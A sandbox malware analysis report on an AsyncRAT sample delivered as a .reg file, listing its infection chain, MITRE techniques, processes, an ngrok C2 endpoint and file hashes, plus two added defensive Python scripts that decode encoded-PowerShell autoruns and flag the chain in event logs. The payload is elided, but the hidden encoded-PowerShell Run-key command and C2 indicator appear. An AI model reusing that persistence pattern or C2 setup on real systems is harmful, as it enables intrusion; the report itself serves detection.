Malware Analysis Report

2025-06-16 00:48

Sample ID: 241107-1smw7s1rhm
Target: YjJqp0O3NZzC.reg
SHA256: cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c
Tags: asyncrat default defense_evasion discovery execution persistence rat
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c
Threat Level: Known bad

The file YjJqp0O3NZzC.reg was classified as Known bad.

Malicious Activity Summary

Tags: asyncrat default defense_evasion discovery execution persistence rat

Observed chain (behavioral1): regedit.exe imports the .reg file, which writes a Run value that launches hidden, policy-bypassing PowerShell with a base64-encoded command. PowerShell drops RegAsm.exe into %TEMP% and the dropped file is executed; the run then resolves and connects to the ngrok tunnel host 4.tcp.eu.ngrok.io, and the payload is identified as AsyncRAT.

Signatures triggered:
  AsyncRat
  Asyncrat family
  Async RAT payload
  System Binary Proxy Execution: Regsvcs/Regasm
  Command and Scripting Interpreter: PowerShell
  Executes dropped EXE
  Adds Run key to start application
  Legitimate hosting services abused for malware hosting/C2
  System Location Discovery: System Language Discovery
  Suspicious use of WriteProcessMemory
  Runs .reg file with regedit
  Suspicious behavior: GetForegroundWindowSpam
  Suspicious use of SendNotifyMessage
  Suspicious use of AdjustPrivilegeToken
  Suspicious use of FindShellTrayWindow
  Suspicious behavior: EnumeratesProcesses
  Runs regedit.exe

MITRE ATT&CK

Enterprise Matrix V15 (technique IDs for the ATT&CK-named signatures above)

  Execution         T1059.001  Command and Scripting Interpreter: PowerShell
  Persistence       T1547.001  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  Defense Evasion   T1218.009  System Binary Proxy Execution: Regsvcs/Regasm
  Discovery         T1614.001  System Location Discovery: System Language Discovery

Analysis: static1

Detonation Overview

Reported: 2024-11-07 21:54

Signatures

None (no static signatures matched)

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-07 21:54
Reported: 2024-11-07 21:57
Platform: win7-20240903-en
Max time kernel: 129s
Max time network: 127s

Command Line

regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"

Signatures

AsyncRat  [rat, asyncrat]
Asyncrat family  [asyncrat]
Async RAT payload  [rat]
  Family identification of the payload; no per-process indicator is recorded for these three.

Command and Scripting Interpreter: PowerShell  [execution]
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Binary Proxy Execution: Regsvcs/Regasm  [defense_evasion]
  File created: C:\Users\Admin\AppData\Local\Temp\RegAsm.exe  (by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
  Key opened: \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe  (by the same powershell.exe; this key is consulted when a process is started)
  Caveat: this signature keys on the file name. A RegAsm.exe in %TEMP% is not the .NET Framework copy under C:\Windows\Microsoft.NET\Framework*; it is either the genuine signed utility copied out to be injected into (the "Suspicious use of WriteProcessMemory" signature in the summary is consistent with that) or a renamed payload. Compare the hash listed under Files with the Framework binary and check its Authenticode signature before deciding which.

Executes dropped EXE
  Process: C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Adds Run key to start application  [persistence]
  Set value (str): \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 payload elided]"  (by C:\Windows\regedit.exe; the value name was not recorded)
  Two identical rows were recorded, one per regedit.exe instance listed under Processes.

Legitimate hosting services abused for malware hosting/C2
  Indicator: 4.tcp.eu.ngrok.io  (ngrok TCP tunnel endpoint; see Network)

System Location Discovery: System Language Discovery  [discovery]
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (by C:\Users\Admin\AppData\Local\Temp\RegAsm.exe)

Runs .reg file with regedit
Runs regedit.exe
  Process: C:\Windows\regedit.exe

Suspicious behavior: GetForegroundWindowSpam
  Process: C:\Windows\regedit.exe
  Process: C:\Windows\system32\taskmgr.exe

Suspicious use of AdjustPrivilegeToken
  Token: SeDebugPrivilege  (C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe)
  Token: SeDebugPrivilege  (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
  Token: SeDebugPrivilege  (C:\Windows\system32\taskmgr.exe)
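The .reg import is the entire initial vector here: regedit.exe writes a Run value whose data is a hidden, policy-bypassing PowerShell command with its payload base64-encoded. The script below is an added worked example (not part of the sandbox output) that parses a .reg export offline, finds Run/RunOnce values invoking PowerShell with -EncodedCommand or any of its accepted prefixes, and decodes the UTF-16LE payload so the command can be read before anything executes. The .reg text it runs on is constructed: the value names and the encoded command (a harmless Write-Host) are not taken from the sample.

```python
"""Static triage of a .reg file: find autorun (Run/RunOnce) values that launch an
encoded PowerShell command and decode the payload.
Added example for this report, not part of the sandbox output. SAMPLE_REG is
constructed; its encoded command is benign."""
import base64
import re

# Autorun key paths (hive-independent, compared case-insensitively).
AUTORUN_KEYS = (
    "\\software\\microsoft\\windows\\currentversion\\run",
    "\\software\\microsoft\\windows\\currentversion\\runonce",
)
# "Name"=<value> or @=<value>; the name may contain escaped quotes/backslashes.
_VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_SWITCH = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)
_UNESCAPE = re.compile(r'\\(["\\])')


def parse_reg(data):
    """Parse .reg text, or the raw bytes regedit exports, into {key: {name: value}}.
    String values are unescaped; dword:/hex: values and '-' (delete) are kept as text."""
    if isinstance(data, bytes):
        # Version 5.00 exports are UTF-16LE with a BOM; legacy REGEDIT4 files are ANSI.
        data = data.decode("utf-16") if data.startswith(b"\xff\xfe") else data.decode("cp1252")
    keys, current, pending = {}, None, ""
    for raw in data.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]  # hex(...) data wraps onto the next line with a trailing backslash
            continue
        if not line or line[0] == ";" or line.startswith(("Windows Registry Editor", "REGEDIT4")):
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1].lstrip("-")  # a leading '-' marks the key for deletion
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) is None else _UNESCAPE.sub(r"\1", m.group(1))
            value = m.group(2)
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = _UNESCAPE.sub(r"\1", value[1:-1])
            keys[current][name] = value
    return keys


def find_encoded_autoruns(reg):
    """Return autorun entries whose command runs PowerShell with an encoded command,
    with the base64 decoded as UTF-16LE (what PowerShell expects) when it is valid."""
    hits = []
    for key, values in reg.items():
        if not key.lower().endswith(AUTORUN_KEYS):
            continue
        for name, cmd in values.items():
            if "powershell" not in cmd.lower():
                continue
            for m in _ENC_SWITCH.finditer(cmd):
                if not "encodedcommand".startswith(m.group(1).lower()):
                    continue  # some other -E... switch, e.g. -ExecutionPolicy
                try:
                    decoded = base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
                except (ValueError, UnicodeDecodeError):
                    decoded = None  # truncated or tampered base64: still report the entry
                hits.append({"key": key, "name": name, "command": cmd, "decoded": decoded})
                break
    return hits


# Constructed sample (assumption: value names and payload are made up, not from the sample).
_B64 = base64.b64encode("Write-Host 'hello from autorun'".encode("utf-16-le")).decode()
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand {B64}"
"Helper"="powershell -ExecutionPolicy Bypass -File C:\\tools\\x.ps1"
"OneDrive"="\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_CURRENT_USER\Software\Example]
"Flag"=dword:00000001
'''.replace("{B64}", _B64)

if __name__ == "__main__":
    for hit in find_encoded_autoruns(parse_reg(SAMPLE_REG)):
        print(f"{hit['key']}\\{hit['name']}\n  command: {hit['command']}\n  decoded: {hit['decoded']}")
```

Only the "Updater" entry is reported: "Helper" carries -ExecutionPolicy but no encoded command, and the OneDrive entry is an ordinary quoted path. Pass the raw bytes of a real export straight to parse_reg; the BOM check handles the UTF-16LE encoding regedit writes.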

Processes

C:\Windows\regedit.exe
  regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"

C:\Windows\regedit.exe
  "C:\Windows\regedit.exe"

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
  "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 payload elided]

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
  "C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"

C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4

Network

Country  Destination          Domain              Proto
US       8.8.8.8:53           4.tcp.eu.ngrok.io   udp
DE       18.198.77.177:2024   4.tcp.eu.ngrok.io   tcp

The tunnel hostname resolved to 18.198.77.177 and the TCP session to port 2024 that followed is consistent with the AsyncRAT command-and-control channel. ngrok TCP endpoints are allocated per tunnel, so the address and port can change and the hostname itself is a shared ngrok edge: record the full host:port pair as the indicator and hunt for any *.tcp.*.ngrok.io resolution from hosts that have no business using the service.

Files

memory/2372-0-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2372-1-0x0000000000210000-0x0000000000211000-memory.dmp
memory/2572-6-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/2572-7-0x0000000001F60000-0x0000000001F68000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5:    9df5ee3447038ee28808dabdc7e97ec0
  SHA1:   f464a8ba5c957a25de36760014bc752d5ae40b08
  SHA256: c0a444a016a834136ac90be99039ba5af759256f2c32b74c0ce544459e59a321
  SHA512: 453906ac10176c3e9a6e60b0b5d9e8f99cc0212259b9790e171b5d66f809b0feaab9a013b603c4ef9f6ea6a78efacdf57226b64ea2916df4a0839f587e1c504f

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
  MD5:    af59d42f6526cfabf0f502f8e83209f9
  SHA1:   6505f4560261dedfae55dc4a5b712802ffb2eed6
  SHA256: f1a47699ad8f48d7cf68f5db51364433ac8695cc6d2149d26dbf20b9af31bf4f
  SHA512: f3fc5ee9df8454ee8abce013a1672fdf01c5a5d08d88e6221c169d3a31d43dbaf50e7bdbbe54e8bb8453f5367d12f016cb834ec6efed363c8f8018cd11e4a646

memory/2856-19-0x0000000000AC0000-0x0000000000AD2000-memory.dmp
memory/868-20-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/868-21-0x0000000140000000-0x00000001405E8000-memory.dmp
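Taken together, the behavioral1 evidence is a short chain that each telemetry source sees from a different angle: a process start for regedit.exe pointing at a .reg under the user profile, a Run-key write whose data is encoded PowerShell, a powershell.exe launch with the same switches, an .exe named RegAsm.exe running from %TEMP% rather than the .NET Framework directory, and a DNS query for an ngrok tunnel host. The Python below is an added example (not sandbox output and not AsyncRAT code) that expresses those observations as rules over a simplified Sysmon-style event list. The events are constructed: PIDs, parent relationships and the Run value name "Updater" are made up; the paths, process names, SID and domain come from this report. Two benign look-alikes (the real Framework RegAsm.exe and an ordinary OneDrive Run value) are included to show the rules stay quiet on them.

```python
"""Behavioural detection for the chain in this report (regedit imports a .reg ->
Run key with hidden encoded PowerShell -> RegAsm.exe dropped to %TEMP% and run ->
ngrok tunnel), evaluated over a constructed Sysmon-style event list.
Added example, not sandbox output: the event schema is simplified, PIDs, parents and
the Run value name are made up; paths, names and the domain are from the report."""
import base64
import ntpath
import re

# Where the genuine .NET Framework RegAsm.exe/RegSvcs.exe live (assumption: default install paths).
DOTNET_DIRS = ("c:\\windows\\microsoft.net\\framework\\", "c:\\windows\\microsoft.net\\framework64\\")
LOLBINS = {"regasm.exe", "regsvcs.exe"}
TEMP_DIR = "\\appdata\\local\\temp\\"
ENC_SWITCH = re.compile(r"-(e[a-z]*)\s+[A-Za-z0-9+/=]{16,}", re.I)
TUNNEL_DNS = re.compile(r"(?:^|\.)ngrok\.io$", re.I)  # the tunnel service seen in the Network table
USER_REG_FILE = re.compile(r'[a-z]:\\users\\[^"]*\.reg\b', re.I)


def encoded_powershell(cmd):
    """True if cmd runs powershell with -EncodedCommand or any accepted prefix (-e, -ec, -enc ...)."""
    if "powershell" not in cmd.lower():
        return False
    return any("encodedcommand".startswith(m.group(1).lower()) for m in ENC_SWITCH.finditer(cmd))


def detect(events):
    """Return (rule, pid, evidence) for every event matching one stage of the chain."""
    image_of = {e["pid"]: e["image"] for e in events if e["event"] == "ProcessCreate"}
    alerts = []
    for e in events:
        kind, pid, image = e["event"], e["pid"], e["image"]
        low = image.lower()
        base = ntpath.basename(low)
        if kind == "ProcessCreate":
            cmd = e["cmdline"]
            parent = image_of.get(e["ppid"], "<unknown>")
            if base == "regedit.exe" and USER_REG_FILE.search(cmd):
                alerts.append(("regedit_imports_user_reg_file", pid, cmd))
            if base == "powershell.exe" and encoded_powershell(cmd):
                alerts.append(("hidden_encoded_powershell", pid, cmd))
            if base in LOLBINS and not low.startswith(DOTNET_DIRS):
                alerts.append(("regasm_outside_dotnet_dir", pid, f"{image} (parent {parent})"))
            if base.endswith(".exe") and TEMP_DIR in low:
                alerts.append(("exe_executed_from_temp", pid, f"{image} (parent {parent})"))
        elif kind == "RegistryValueSet":
            if "\\currentversion\\run" in e["target"].lower() and encoded_powershell(e["details"]):
                alerts.append(("autorun_encoded_powershell", pid, f"{image} wrote {e['target']}"))
        elif kind == "DnsQuery":
            if TUNNEL_DNS.search(e["query"]):
                alerts.append(("tunnel_service_dns", pid, f"{image} -> {e['query']}"))
    return alerts


# Constructed events modelled on the behavioral1 run (PIDs, parents, value name are assumptions).
_B64 = base64.b64encode("Write-Host 'demo'".encode("utf-16-le")).decode()
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_RUN = "HKU\\S-1-5-21-4177215427-74451935-3209572229-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
_DROP = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RegAsm.exe"
EVENTS = [
    {"event": "ProcessCreate", "pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"event": "ProcessCreate", "pid": 200, "ppid": 100, "image": "C:\\Windows\\regedit.exe",
     "cmdline": 'regedit.exe "C:\\Users\\Admin\\AppData\\Local\\Temp\\YjJqp0O3NZzC.reg"'},
    {"event": "RegistryValueSet", "pid": 200, "image": "C:\\Windows\\regedit.exe", "target": _RUN + "Updater",
     "details": f"powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand {_B64}"},
    {"event": "ProcessCreate", "pid": 300, "ppid": 100, "image": _PS,
     "cmdline": f'"{_PS}" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand {_B64}'},
    {"event": "ProcessCreate", "pid": 400, "ppid": 300, "image": _DROP, "cmdline": f'"{_DROP}"'},
    {"event": "DnsQuery", "pid": 400, "image": _DROP, "query": "4.tcp.eu.ngrok.io"},
    # Benign look-alikes that must stay quiet: the real Framework RegAsm and an ordinary Run value.
    {"event": "ProcessCreate", "pid": 500, "ppid": 100,
     "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "cmdline": "RegAsm.exe /codebase C:\\Build\\Component.dll"},
    {"event": "RegistryValueSet", "pid": 600, "image": "C:\\Windows\\System32\\msiexec.exe",
     "target": _RUN + "OneDrive",
     "details": '"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for rule, pid, evidence in detect(EVENTS):
        print(f"[{rule}] pid={pid}: {evidence}")
```

The rules fire six times, all on PIDs 200, 300 and 400, and never on the Framework RegAsm.exe or the OneDrive entry. The regasm_outside_dotnet_dir rule is the one that would have distinguished this sample's %TEMP% copy from the signed utility the Regsvcs/Regasm signature name suggests.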

Analysis: behavioral2

Detonation Overview

Submitted: 2024-11-07 21:54
Reported: 2024-11-07 21:55
Platform: win10v2004-20241007-en
Max time kernel: 2s
Max time network: 4s

Command Line

regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"

Signatures

Adds Run key to start application  [persistence]
  Set value (str): \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand [base64 payload elided]"  (by C:\Windows\regedit.exe; the value name was not recorded)

Runs .reg file with regedit
  Process: C:\Windows\regedit.exe

Only the .reg import and the Run-key write were captured in the 2 s of kernel time; the PowerShell stage and the RegAsm.exe payload seen on Windows 7 did not run here. On its own the Windows 10 detonation therefore shows persistence only, with the Run value due to execute at the next logon, outside the sandbox window.

Processes

C:\Windows\regedit.exe

regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"

Network

Country  Destination   Domain                        Proto
US       8.8.8.8:53    241.150.49.20.in-addr.arpa    udp
US       8.8.8.8:53    77.190.18.2.in-addr.arpa      udp
US       8.8.8.8:53    95.221.229.192.in-addr.arpa   udp

Only reverse-DNS (PTR) lookups were captured, none attributable to a process of the sample; the ngrok host contacted in behavioral1 was not resolved in this run.

Files

None